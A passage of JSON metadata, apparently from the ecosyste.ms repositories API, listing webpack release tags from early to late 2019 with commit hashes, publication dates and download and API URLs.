"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2F